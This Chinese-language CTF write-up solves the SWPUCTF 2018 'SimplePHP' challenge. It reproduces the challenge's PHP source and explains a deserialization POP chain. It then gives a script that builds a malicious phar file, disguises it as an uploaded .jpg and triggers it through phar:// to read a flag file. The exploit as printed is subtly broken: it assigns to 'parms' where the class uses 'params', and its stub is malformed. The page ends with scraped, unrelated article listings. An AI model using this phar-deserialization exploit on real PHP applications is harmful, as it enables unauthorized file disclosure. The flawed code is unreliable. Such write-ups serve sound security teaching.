[SWPUCTF 2018]SimplePHP

知识点

1.PHP反序列化入门之phar

2.反序列化魔术方法

__construct()//当一个对象创建时被调用

__destruct() //当一个对象销毁时被调用

__toString() //当一个对象被当作一个字符串使用

__sleep()//在对象在被序列化之前运行

__wakeup()//将在反序列化之后立即被调用(通过序列化对象元素个数不符来绕过)

__get()//获得一个类的成员变量时调用

__set()//设置一个类的成员变量时调用

__invoke()//调用函数的方式调用一个对象时的回应方法

__call()//当调用一个对象中的不能用的方法的时候就会执行这个函数

题解

打开题目后,常规性试探一波,发现“查看文件”时,出现了?file=,应该是存在文件包含了

得到file.php、function.php、class.php、base.php源码

file.php

<?php

header("content-type:text/html;charset=utf-8");

include 'function.php';

include 'class.php';

ini_set('open_basedir','/var/www/html/');

$file = $_GET["file"] ? $_GET['file'] : "";

if(empty($file)) {

    echo "<h2>There is no file to show!<h2/>";

}

$show = new Show();

if(file_exists($file)) {

    $show->source = $file;

    $show->_show();

} else if (!empty($file)){

    die('file doesn\'t exists.');

}

?>

function.php

<?php

//show_source(__FILE__);

include "base.php";

header("Content-type: text/html;charset=utf-8");

error_reporting(0);

function upload_file_do() {

    global $_FILES;

    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";

    //mkdir("upload",0777);

    if(file_exists("upload/" . $filename)) {

        unlink($filename);

    }

    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);

    echo '<script type="text/javascript">alert("上传成功!");</script>';

}

function upload_file() {

    global $_FILES;

    if(upload_file_check()) {

        upload_file_do();

    }

}

function upload_file_check() {

    global $_FILES;

    $allowed_types = array("gif","jpeg","jpg","png");

    $temp = explode(".",$_FILES["file"]["name"]);

    $extension = end($temp);

    if(empty($extension)) {

        //echo "<h4>请选择上传的文件:" . "<h4/>";

    }

    else{

        if(in_array($extension,$allowed_types)) {

            return true;

        }

        else {

            echo '<script type="text/javascript">alert("Invalid file!");</script>';

            return false;

        }

    }

}

?>

class.php

 <?php

class C1e4r

{

    public $test;

    public $str;

    public function __construct($name)

    {

        $this->str = $name;

    }

    public function __destruct()

    {

        $this->test = $this->str;

        echo $this->test;

    }

}

class Show

{

    public $source;

    public $str;

    public function __construct($file)

    {

        $this->source = $file;   //$this->source = phar://phar.jpg

        echo $this->source;

    }

    public function __toString()

    {

        $content = $this->str['str']->source;

        return $content;

    }

    public function __set($key,$value)

    {

        $this->$key = $value;

    }

    public function _show()

    {

        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {

            die('hacker!');

        } else {

            highlight_file($this->source);

        }

    }

    public function __wakeup()

    {

        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {

            echo "hacker~";

            $this->source = "index.php";

        }

    }

}

class Test

{

    public $file;

    public $params;

    public function __construct()

    {

        $this->params = array();

    }

    public function __get($key)

    {

        return $this->get($key);

    }

    public function get($key)

    {

        if(isset($this->params[$key])) {

            $value = $this->params[$key];

        } else {

            $value = "index.php";

        }

        return $this->file_get($value);

    }

    public function file_get($value)

    {

        $text = base64_encode(file_get_contents($value));

        return $text;

    }

}

?>

base.php

<?php

    session_start();

?>

<!DOCTYPE html>

<html>

<head>

    <meta charset="utf-8">

    <title>web3</title>

    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css">

    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script>

    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>

</head>

<body>

    <nav class="navbar navbar-default" role="navigation">

        <div class="container-fluid">

        <div class="navbar-header">

            <a class="navbar-brand" href="index.php">首页</a>

        </div>

            <ul class="nav navbar-nav navbra-toggle">

                <li class="active"><a href="file.php?file=">查看文件</a></li>

                <li><a href="upload_file.php">上传文件</a></li>

            </ul>

            <ul class="nav navbar-nav navbar-right">

                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li>

            </ul>

        </div>

    </nav>

</body>

</html>

<!--flag is in f1ag.php-->

从以上源码中我们可以得到如下信息:

1.flag在f1ag.php中但是“f1ag”被过滤了

2.上传的文件类型采用白名单

3.所有源代码均没有出现unserialize(),所以不能采用常规反序列化。同时有注释出现了phar,且phar协议没被过滤,所以这题是PHP反序列化中的phar反序列化。

一步步解析

Show类

public function __toString()

    {

        $content = $this->str['str']->source;

        return $content;

    }

要触发__toString()我们需要当一个对象被当作一个字符串使用

同时

$content = $this->str['str']->source;

获得一个类的成员变量时调用get()

C1e4r类

public function __destruct()

    {

        $this->test = $this->str;

        echo $this->test;

    }

在destruct()中存在echo能输出字符串来触发toString()

Test类

public function __get($key)

    {

        return $this->get($key);

    }

利用__get()触发file_get()最终触发file_get_contents()

梳理清楚pop链,构造exp:

<?php

class C1e4r

{

    public $test;

    public $str;

}

class Show

{

    public $source;

    public $str;

}

class Test

{

    public $file;

    public $params;

}

$clear = new C1e4r();

$show = new Show();

$test = new Test();

$test->parms['source'] ="/var/www/html/f1ag.php";

$clear->str = $show; //利用$this->test = $this->str;echo $this->test;

$show->str['str'] = $test; //利用$this->str['str']->source;

$phar = new Phar("rabbit.phar"); //.phar文件

$phar->startBuffering();

$phar->setStub('<?php __HALT_COMPILER(); ? >');

$phar->setMetadata($clear); //触发的头是C1e4r类,所以传入C1e4r对象

$phar->addFromString("test.txt", "test"); //生成签名

$phar->stopBuffering();

?>

在本地环境中生成phar文件(自己电脑也不知道什么问题一直生成不了,用学长的电脑就行)

本题没有对upload目录做处理可以直接访问,获取上传的文件名

回到file.php页面

file.php/?file=phar://upload/xxxxxxxxxxxxxxxxxxx.jpg

得到base64加密内容

base64解密得到flag.

[SWPUCTF 2018]SimplePHP的更多相关文章

  1. php代码审计整理

    目录 变量覆盖 1x01.extract 变量覆盖 定义和用法 语法 漏洞产生:使用了默认设置 攻击方法:制造变量名冲突,对于需要相等的值可以同时置空 修复:设定一个冲突时的处理规则 例题: 1x02 ...

  2. 2018. The Debut Album

    http://acm.timus.ru/problem.aspx?space=1&num=2018 真心爱过,怎么能彻底忘掉 题目大意: 长度为n的串,由1和2组成,连续的1不能超过a个,连续 ...

  3. Math.abs(~2018),掌握规律即可!

    Math.abs(~2018) 某前端群的入门问题长姿势了,一个简单的入门问题却引发了我的思考,深深的体会到自己在学习前端技术的同时忽略遗忘了一些计算机的基础知识. 对于 JS Math对象没什么可说 ...

  4. 肖秀荣8套卷2018pdf下载|2018肖秀荣冲刺8套卷pdf下载电子版

    肖秀荣8套卷2018pdf下载|2018肖秀荣冲刺8套卷pdf下载电子版 下载链接: https://u253469.ctfile.com/fs/253469-229815828

  5. 2018年的UX设计师薪酬预测,你能拿多少?

    以下内容由Mockplus团队翻译整理,仅供学习交流,Mockplus是更快更简单的原型设计工具.   一个经验丰富的设计师完全可以根据地区和专业来可以预期薪酬之间的差距,其中悬殊最高可达80K. 本 ...

  6. Hello 2018, Bye 2017

    2017年过去了,过去一年经历了太多,改变了好多好多,可以说人生进入了另一个阶段,有可能是成熟吧. 回顾2017 去年换了新工作,离开了将近工作了8年的公司,不带走一丝云彩,为其任劳任怨,最后没有任何 ...

  7. New Life With 2018

    2017年转眼过去了.对自己来说.这一大年是迷茫和认知的一年.我的第一篇博客就这样记录下自己的历程吧 一:选择 从进入这一行到现在已经一年多了,2016年11月份就像所有的应届毕业生一样,都贼反感毕业 ...

  8. 2017 年终总结 & 2018 年度计划

    不立几个 Flag,都不知道怎么作死 2017 年度计划完成情况: 1.健身时间不少于350天:  未完成 中断了22天,实际运动 343天   2.至少每个月看一本书:  及格 <切尔诺贝利的 ...

  9. [总结]-2018 w1

    不想总结 2017,过去的就过去吧,不过自己在 2017 年还是收获了很多,最重要的就是赚钱.赚钱还是需要两把刷子,所以,2018 的小目标就是学习数据分析和机器学习.希望自己在这两个领域能搞点事情. ...

随机推荐

  1. 2021 .NET 开发者峰会顺利在网上落幕,线上直播回看汇总

    .NET Conf China 2021 是面向开发人员的社区峰会,基于 .NET Conf 2021的活动,庆祝 .NET 6 的发布和回顾过去一年来 .NET 在中国的发展成果展示,它是由中国各地 ...

  2. NOAA数据下载方法

    NOAA OneStop https://data.noaa.gov/onestop/about NOAA 数据搜索平台,在一个地方同时搜索NOAA的 Geophysical, oceans, coa ...

  3. Spring5 AOP编程:关于org.springframework.beans.factory.BeanNotOfRequiredTypeException报错

    Spring5 AOP编程:关于org.springframework.beans.factory.BeanNotOfRequiredTypeException报错 先上错误详细信息: org.spr ...

  4. CF102B Sum of Digits 题解

    Content 给定一个数 \(n\),每次操作可以将 \(n\) 变成 \(n\) 各位数之和.问你几次操作之后可以将 \(n\) 变为一位数. 数据范围:\(1\leqslant n\leqsla ...

  5. 简单备忘一下Linux下的wget和curl如何使用http proxy

    简单备忘一下Linux下的wget和curl如何使用http proxywget -e "http_proxy=porxyhost:port" www.baidu.comcurl ...

  6. windows10源码编译llvm

    准备 cmake, 我目前使用的版本是3.18 llvm 源码, 我下载的是 11.0 我已经具备Vs2015和Vs2017的开发环境. debug模式编译需要较多内存和较多硬盘存储空间. (debu ...

  7. 使用unc0ver(5.3.1)执行jailbreak踩坑

    官方网站: https://unc0ver.dev/ 目前版本: 5.3.1 使用mac os+altstore步骤: AltStore Download AltStore. Use the link ...

  8. 【LeetCode】366. Find Leaves of Binary Tree 解题报告 (C++)

    作者: 负雪明烛 id: fuxuemingzhu 个人博客:http://fuxuemingzhu.cn/ 目录 题目描述 题目大意 解题方法 DFS 日期 题目地址:https://leetcod ...

  9. 【LeetCode】908. Smallest Range I 解题报告(Python)

    作者: 负雪明烛 id: fuxuemingzhu 个人博客: http://fuxuemingzhu.cn/ 目录 题目描述 题目大意 解题方法 数学计算 日期 题目地址:https://leetc ...

  10. Java Web程序设计笔记 • 【第9章 EL表达式】

    全部章节   >>>> 本章目录 9.1 EL 表达式基础 9.1.1 EL 表达式简介 9.1.2 EL 表达式的定义 9.1.3 使用 EL 访问变量 9.1.4 使用 E ...